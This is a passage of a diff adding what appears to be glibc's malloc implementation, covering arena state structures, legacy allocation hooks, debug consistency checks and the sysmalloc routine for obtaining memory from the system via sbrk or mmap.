+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programming errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum), this only
+         happens for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If we have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
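+      /* Illustrative example for the common MALLOC_ALIGNMENT == 2 * SIZE_SZ
+         case, assuming SIZE_SZ == 8 and a 4 KiB page: a normalized request
+         of nb == 0x21000 becomes 0x21008 after the single SIZE_SZ of mmap
+         overhead and is rounded up to a 0x22000-byte mapping.  */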
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If we have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
